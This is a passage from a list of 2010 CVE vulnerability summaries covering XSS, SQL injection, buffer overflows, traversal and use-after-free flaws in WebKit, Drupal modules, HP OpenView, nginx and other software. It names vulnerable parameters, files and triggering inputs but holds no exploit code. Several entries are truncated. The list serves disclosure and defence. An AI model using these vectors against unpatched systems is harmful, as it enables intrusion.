(1) search, (2) sbr, (3) p, and (4) sbl parameters, different vectors than CVE-2007-3137. [CVE-2010-2309] Buffer overflow in the web server for EvoLogical EvoCam 3.6.6 and 3.6.7 allows remote attackers to execute arbitrary code via a long GET request. [CVE-2010-2307] Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. [CVE-2010-2302] Use-after-free vulnerability in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via vectors involving remote fonts in conjunction with shadow DOM trees, aka rdar problem 8007953. NOTE: this might overlap CVE-2010-1771. [CVE-2010-2301] Cross-site scripting (XSS) vulnerability in editing/markup.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to inject arbitrary web script or HTML via vectors related to the node.innerHTML property of a TEXTAREA element. NOTE: this might overlap CVE-2010-1762. [CVE-2010-2300] Use-after-free vulnerability in the Element::normalizeAttributes function in dom/Element.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to handlers for DOM mutation events, aka rdar problem 7948784. NOTE: this might overlap CVE-2010-1759. [CVE-2010-2297] rendering/FixedTableLayout.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an HTML document that has a large colspan attribute within a table. [CVE-2010-2295] page/EventHandler.cpp in WebCore in WebKit in Google Chrome before 5.0.375.70 does not properly handle a change of the focused frame during the dispatching of keydown, which allows user-assisted remote attackers to redirect keystrokes via a crafted HTML document, aka rdar problem 7018610. NOTE: this might overlap CVE-2010-1422. [CVE-2010-2290] Cross-site scripting (XSS) vulnerability in cgi-bin/cgix/help in McAfee Unified Threat Management (UTM) Firewall (formerly SnapGear) firmware 3.0.0 through 4.0.6 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2010-2289] Open redirect vulnerability in dana/home/homepage.cgi in Juniper Networks IVE 6.5R1 (Build 14599) and 6.5R2 (Build 14951) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the Location parameter. [CVE-2010-2288] Cross-site scripting (XSS) vulnerability in dana/nc/ncrun.cgi in Juniper Networks IVE 6.5R1 (Build 14599) and 6.5R2 (Build 14951) allows remote attackers to inject arbitrary web script or HTML via the DSSignInURL cookie. [CVE-2010-2281] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS 2.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword or (2) bannerid parameter in conjunction with a /admin/ad/banner/list PATH_INFO [CVE-2010-2280] Open redirect vulnerability in the Mobile component in IBM Lotus Connections 2.5.x before 2.5.0.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, related to "mobile edit actions," aka SPR ASRE83PPVH. [CVE-2010-2277] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Connections 2.5.x before 2.5.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) create or (2) edit form in the Communities component, the (3) verbiage field in the Bookmarks component, or (4) unspecified vectors related to the Mobile Blogs component. [CVE-2010-2275] Cross-site scripting (XSS) vulnerability in dijit/tests/_testCommon.js in Dojo Toolkit SDK before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the theme parameter, as demonstrated by an attack against dijit/tests/form/test_Button.html. [CVE-2010-2274] Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html. [CVE-2010-2273] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, and util/buildscripts/jslib/buildUtil.js, as demonstrated by the (1) dojoUrl and (2) testUrl parameters to util/doh/runner.html. [CVE-2010-2271] Format string vulnerability in authcfg.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to have an unspecified impact via format string specifiers in the path (aka Password File) parameter. [CVE-2010-2270] Accoria Web Server (aka Rock Web Server) 1.4.7 uses a predictable httpmod-sessionid cookie, which makes it easier for remote attackers to hijack sessions via a modified cookie. [CVE-2010-2269] Directory traversal vulnerability in loadstatic.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the name parameter. [CVE-2010-2268] Cross-site request forgery (CSRF) vulnerability in authcfg.cgi in Accoria Web Server (aka Rock Web Server) 1.4.7 allows remote attackers to hijack the authentication of administrators for requests that create user accounts. [CVE-2010-2267] Multiple cross-site scripting (XSS) vulnerabilities in Accoria Web Server (aka Rock Web Server) 1.4.7 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the getenv sample program, (2) the desc parameter to loadstatic.cgi, (3) the name parameter to httpdcfg.cgi, or (4) the dns parameter to servercfg.cgi. [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2264] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2010-2262] Galileo Students Team Weborf before 0.12.1 allows remote attackers to cause a denial of service (crash) via a crafted Range header. [CVE-2010-2260] Multiple cross-site scripting (XSS) vulnerabilities in Gambit Design Bandwidth Meter, 0.72 and possibly 1.2, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) view_by_name.php or (2) view_by_ip.php in admin/. NOTE: some sources report that the affected product is ShaPlus Bandwidth Meter, but this is incorrect. [CVE-2010-2258] Cross-site scripting (XSS) vulnerability in signupconfirm.php in phpBannerExchange 1.2 Arabic allows remote attackers to inject arbitrary web script or HTML via the bannerurl parameter. [CVE-2010-2256] Multiple cross-site scripting (XSS) vulnerabilities in Pay Per Minute Video Chat Script 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/memberviewdetails.php and the (2) model parameter to videos.php. [CVE-2010-2230] The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input. [CVE-2010-2229] Multiple cross-site scripting (XSS) vulnerabilities in blog/index.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2010-2193] Multiple unspecified vulnerabilities in the CA (1) PSFormX and (2) WebScan ActiveX controls, as distributed on the CA Global Advisor web site until May 2009, allow remote attackers to execute arbitrary code via unknown vectors. [CVE-2010-2179] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, when Firefox or Chrome is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to URL parsing. [CVE-2010-2158] Multiple cross-site scripting (XSS) vulnerabilities in the Storm module 5.x and 6.x before 6.x-1.33 for Drupal allow remote authenticated users, with certain module privileges, to inject arbitrary web script or HTML via the (1) fullname, (2) phone, or (3) im parameter in a stormperson action to index.php. NOTE: the provenance of this information is unknown [CVE-2010-2155] Multiple cross-site scripting (XSS) vulnerabilities in zc/publisher/html.rb in ZoneCheck 2.1.0 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) xmlnode.value, (2) zc-error text, (3) $zc_version, (4) domainname in a zc-title row, different vulnerabilities than CVE-2009-4882. [CVE-2010-2154] Cross-site scripting (XSS) vulnerability in the Search Site in CMScout 2.09, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2150] Cross-site scripting (XSS) vulnerability Fujitsu e-Pares V01 L01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2149] Session fixation vulnerability in Fujitsu e-Pares V01 L01, L03, L10, L20, L30 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2010-2147] Cross-site scripting (XSS) vulnerability in the My Car (com_mycar) component 1.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the modveh parameter to index.php. [CVE-2010-2144] Cross-site scripting (XSS) vulnerability in signinform.php in Zeeways eBay Clone Auction Script allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2141] SQL injection vulnerability in index.php in NITRO Web Gallery allows remote attackers to execute arbitrary SQL commands via the PictureId parameter in an open action. [CVE-2010-2130] Cross-site scripting (XSS) vulnerability in wflogin.jsp in Aris Global ARISg 5.0 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter. [CVE-2010-2125] Multiple cross-site scripting (XSS) vulnerabilities in the Rotor Banner module 5.x before 5.x-1.8 and 6.x before 6.x-2.5 for Drupal allow remote authenticated users, with "create rotor item" or "edit any rotor item" privileges, to inject arbitrary web script or HTML via the (1) srs, (2) title, or (3) alt image attribute. [CVE-2010-2123] Multiple cross-site scripting (XSS) vulnerabilities in the Storm module 5.x and 6.x before 6.x-1.33 for Drupal allow remote authenticated users, with certain module privileges, to inject arbitrary web script or HTML via the (1) fullname, (2) address, (3) city, (4) provstate (aka state), (5) phone, or (6) taxid parameter in a stormorganization action to index.php [CVE-2010-2114] Cross-site request forgery (CSRF) vulnerability in pbx/gate in Brekeke PBX 2.4.4.8 allows remote attackers to hijack the authentication of users for requests that change passwords via the pbxadmin.web.PbxUserEdit bean. [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2102] Buffer overflow in Webby Webserver 1.01 allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-2087] Oracle Mojarra 1.2_14 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object. [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object. [CVE-2010-2080] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) 2.3.x before 2.3.6 and 2.4.x before 2.4.8 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2079] DataTrack System 3.5 allows remote attackers to bypass intended restrictions on file extensions, and read arbitrary files, via a trailing backslash in a URI, as demonstrated by (1) web.config\ and (2) .ascx\ files. [CVE-2010-2049] Cross-site scripting (XSS) vulnerability in jsp/audit/reports/ExportReport.jsp in ManageEngine ADAudit Plus 4.0.0 build 4043 allows remote attackers to inject arbitrary web script or HTML via the reportList parameter. NOTE: the provenance of this information is unknown [CVE-2010-2048] Multiple cross-site scripting (XSS) vulnerabilities in the Heartbeat module 6.x before 6.x-4.9 for Drupal allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-2046] Multiple cross-site scripting (XSS) vulnerabilities in the ActiveHelper LiveHelp (com_activehelper_livehelp) component 2.0.3 for Joomla! allow remote attackers to inject arbitrary web script or HTML via (1) the DOMAINID parameter to server/cookies.php or (2) the SERVER parameter to server/index.php. [CVE-2010-2043] Cross-site scripting (XSS) vulnerability in Home.aspx in DataTrack System 3.5 and 3.5.8019.4 allows remote attackers to inject arbitrary web script or HTML via the Work_Order_Summary parameter (aka the request summary). NOTE: some of these details are obtained from third party information. [CVE-2010-2041] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP-Calendar before 2.0 Beta7 allow remote attackers to inject arbitrary web script or HTML via the (1) description and (2) lastaction parameters. [CVE-2010-2040] Cross-site scripting (XSS) vulnerability in search.php in V-EVA Shopzilla Affiliate Script PHP allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2010-2038] Cross-site scripting (XSS) vulnerability in include/tool/editing_files.php in gpEasy CMS 1.6.2 allows remote authenticated users, with Edit privileges, to inject arbitrary web script or HTML via the gpcontent parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-2032] Multiple cross-site scripting (XSS) vulnerabilities in resin-admin/digest.php in Caucho Technology Resin Professional 3.1.5, 3.1.10, 4.0.6, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via the (1) digest_realm or (2) digest_username parameters. NOTE: some of these details are obtained from third party information. [CVE-2010-2031] KAVSafe.sys 2010.4.14.609 and earlier, as used in Kingsoft Webshield 3.5.1.2 and earlier, allows local users to overwrite arbitrary kernel memory via a crafted request to IOCTL 0x830020d4 on the KAVSafe device. [CVE-2010-2030] Cross-site scripting (XSS) vulnerability in the External Link Page module 5.x before 5.x-1.0 and 6.x before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to the administration and redirect pages. [CVE-2010-2021] Open redirect vulnerability in the Global Redirect module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.4 for Drupal, when non-clean to clean is enabled, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter. [CVE-2010-2017] Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-2014] Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter. [CVE-2010-2013] Cross-site scripting (XSS) vulnerability in cp/edit_email.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2010-2010] Multiple cross-site scripting (XSS) vulnerabilities in the Chaos Tool Suite (aka CTools) module 6.x before 6.x-1.4 for Drupal allow remote attackers to inject arbitrary web script or HTML via a node title. [CVE-2010-2003] Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter. [CVE-2010-2002] Cross-site scripting (XSS) vulnerability in the Wordfilter module 5.x before 5.x-1.1 and 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with "administer words filtered" privileges, to inject arbitrary web script or HTML via the word list. [CVE-2010-2001] Cross-site scripting (XSS) vulnerability in the CiviRegister module before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2010-2000] Cross-site scripting (XSS) vulnerability in the Bibliography (Biblio) module 5.x through 5.x-1.17 and 6.x through 6.x-1.9 for Drupal allows remote authenticated users, with "administer biblio" privileges, to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-1358. [CVE-2010-1998] Cross-site scripting (XSS) vulnerability in the CCK TableField module 6.x before 6.x-1.2 for Drupal allows remote authenticated users, with certain node creation or editing privileges, to inject arbitrary web script or HTML via table headers. [CVE-2010-1997] Cross-site scripting (XSS) vulnerability in admin/edit.php in Saurus CMS 4.7.0 allows remote authenticated users, with "Article list" edit privileges, to inject arbitrary web script or HTML via the pealkiri parameter. [CVE-2010-1996] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS before 2.0.5 allow remote authenticated users, with certain creation privileges, to inject arbitrary web script or HTML via the (1) content parameter in conjunction with a /admin/poll/add PATH_INFO, the (2) meta parameter in conjunction with a /admin/category/add PATH_INFO, and the (3) keyword parameter in conjunction with a /admin/tag/add PATH_INFO. [CVE-2010-1995] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS before 2.0.5 allow remote authenticated users, with "Add new article" privileges, to inject arbitrary web script or HTML via the (1) title, (2) subTitle, and (3) author parameters in conjunction with a /admin/news/article/add PATH_INFO. [CVE-2010-1984] Cross-site scripting (XSS) vulnerability in the Taxonomy Breadcrumb module 5.x before 5.x-1.5 and 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via the taxonomy term name in a Breadcrumb display. [CVE-2010-1976] Cross-site scripting (XSS) vulnerability in the Taxonomy Breadcrumb module 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via the node title in a Breadcrumb display. [CVE-2010-1972] The default configuration of HP Client Automation (HPCA) Enterprise Infrastructure (aka Radia) allows remote attackers to read log files, and consequently cause a denial of service or have unspecified other impact, via web requests. [CVE-2010-1969] Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-1964] Buffer overflow in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unspecified parameters to jovgraph.exe, aka ZDI-CAN-683. [CVE-2010-1963] Cross-site scripting (XSS) vulnerability in HP ServiceCenter allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1961] Buffer overflow in ovutil.dll in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unspecified variables to jovgraph.exe, which are not properly handled in a call to the sprintf function. [CVE-2010-1960] Buffer overflow in the error handling functionality in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via a long, invalid option to jovgraph.exe. [CVE-2010-1958] Cross-site scripting (XSS) vulnerability in the FileField module 5.x before 5.x-2.5 and 6.x before 6.x-3.4 for Drupal allows remote authenticated users, with create or edit permissions and 'Path to File' or 'URL to File' display enabled, to inject arbitrary web script or HTML via the file name (filepath parameter). [CVE-2010-1941] Unspecified vulnerability in NEC WebSAM DeploymentManager 5.13 and earlier, as used in SigmaSystemCenter 2.1 Update2 and earlier, BladeSystemCenter, ExpressSystemCenter, and VirtualPCCenter 2.2 and earlier, allows remote attackers to cause a denial of service (OS shutdown or restart) via unknown vectors related to Client Service for DPM and crafted packets to port 56010. [CVE-2010-1940] Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown [CVE-2010-1930] Off-by-one error in Novell iManager 2.7, 2.7.3, and 2.7.3 FTF2 allows remote attackers to cause a denial of service (daemon crash) via a long tree parameter in a login request to nps/servlet/webacc. [CVE-2010-1929] Multiple stack-based buffer overflows in the jclient._Java_novell_jclient_JClient_defineClass@20 function in jclient.dll in the Tomcat web server in Novell iManager 2.7, 2.7.3, and 2.7.3 FTF2 allow remote authenticated users to execute arbitrary code via the (1) EnteredClassID or (2) NewClassName parameter to nps/servlet/webacc. [CVE-2010-1924] SQL injection vulnerability in index.php in Hi Web Wiesbaden Live Shopping Multi Portal System allows remote attackers to execute arbitrary SQL commands via the artikel parameter. [CVE-2010-1923] SQL injection vulnerability in user.php in Hi Web Wiesbaden Web 2.0 Social Network Freunde Community System allows remote attackers to execute arbitrary SQL commands via the id parameter in a showgallery action. [CVE-2010-1905] Multiple cross-site scripting (XSS) vulnerabilities in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allow remote attackers to inject arbitrary web script or HTML via crafted input to ASP pages, as demonstrated using the backurl parameter to sdccommon/verify/asp/n6plugindestructor.asp. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1872] Cross-site scripting (XSS) vulnerability in cPlayer.php in FlashCard 2.6.5 and 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-1856] Cross-site scripting (XSS) vulnerability in index.php in RepairShop2 1.9.023 Trial, when magic_quotes_gpc is disabled, allows remote attackers to inject arbitrary web script or HTML via the prod parameter in a products.details action. [CVE-2010-1854] Cross-site scripting (XSS) vulnerability in auktion.php in Pay Per Watch & Bid Auktions System allows remote attackers to inject arbitrary web script or HTML via the id_auk parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown [CVE-2010-1852] Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue. [CVE-2010-1851] Google Chrome, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue. [CVE-2010-1834] CFNetwork in Apple Mac OS X 10.6.x before 10.6.5 does not properly validate the domains of cookies, which makes it easier for remote web servers to track users by setting a cookie that is associated with a partial IP address. [CVE-2010-1825] Use-after-free vulnerability in WebKit, as used in Google Chrome before 6.0.472.59, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to nested SVG elements. [CVE-2010-1824] Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages. [CVE-2010-1823] Use-after-free vulnerability in WebKit before r65958, as used in Google Chrome before 6.0.472.59, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger use of document APIs such as document.close during parsing, as demonstrated by a Cascading Style Sheets (CSS) file referencing an invalid SVG font, aka rdar problem 8442098. [CVE-2010-1822] WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3 and Google Chrome before 6.0.472.62, does not properly perform a cast of an unspecified variable, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG element in a non-SVG document. [CVE-2010-1815] Use-after-free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars. [CVE-2010-1814] WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors involving form menus. [CVE-2010-1813] WebKit in Apple iOS before 4.1 on the iPhone and iPod touch allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors involving HTML object outlines. [CVE-2010-1812] Use-after-free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving selections. [CVE-2010-1807] WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2 [CVE-2010-1794] The webdav_mount function in webdav_vfsops.c in the WebDAV kernel extension (aka webdav_fs.kext) for Mac OS X 10.6 allows local users to cause a denial of service (panic) via a mount request with a large integer in the pa_socket_namelen field. [CVE-2010-1793] Multiple use-after-free vulnerabilities in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1792] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1791] Integer signedness error in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a JavaScript array index. [CVE-2010-1790] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1789] Heap-based buffer overflow in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a JavaScript string object. [CVE-2010-1788] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1787] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1786] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1785] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1784] The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1783] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1782] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1781] Double free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the rendering of an inline element. [CVE-2010-1780] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1778] Cross-site scripting (XSS) vulnerability in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via an RSS feed. [CVE-2010-1774] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses out-of-bounds memory during processing of HTML tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1773] Off-by-one error in the toAlphabetic function in rendering/RenderListMarker.cpp in WebCore in WebKit before r59950, as used in Google Chrome before 5.0.375.70, allows remote attackers to obtain sensitive information, cause a denial of service (memory corruption and application crash), or possibly execute arbitrary code via vectors related to list markers for HTML lists, aka rdar problem 8009118. [CVE-2010-1772] Use-after-free vulnerability in page/Geolocation.cpp in WebCore in WebKit before r59859, as used in Google Chrome before 5.0.375.70, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site, related to failure to stop timers associated with geolocation upon deletion of a document. [CVE-2010-1771] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving fonts. [CVE-2010-1770] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Apple Safari before 4.1 on Mac OS X 10.4, and Google Chrome before 5.0.375.70 does not properly handle a transformation of a text node that has the IBM1147 character set, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document containing a BR element, related to a "type checking issue." [CVE-2010-1769] WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, accesses out-of-bounds memory during the handling of tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, a different vulnerability than CVE-2010-1387 and CVE-2010-1763. [CVE-2010-1767] Cross-site request forgery (CSRF) vulnerability in loader/DocumentThreadableLoader.cpp in WebCore in WebKit before r57041, as used in Google Chrome before 4.1.249.1059, allows remote attackers to hijack the authentication of unspecified victims via a crafted synchronous preflight XMLHttpRequest operation. [CVE-2010-1766] Off-by-one error in the WebSocketHandshake::readServerHandshake function in websockets/WebSocketHandshake.cpp in WebCore in WebKit before 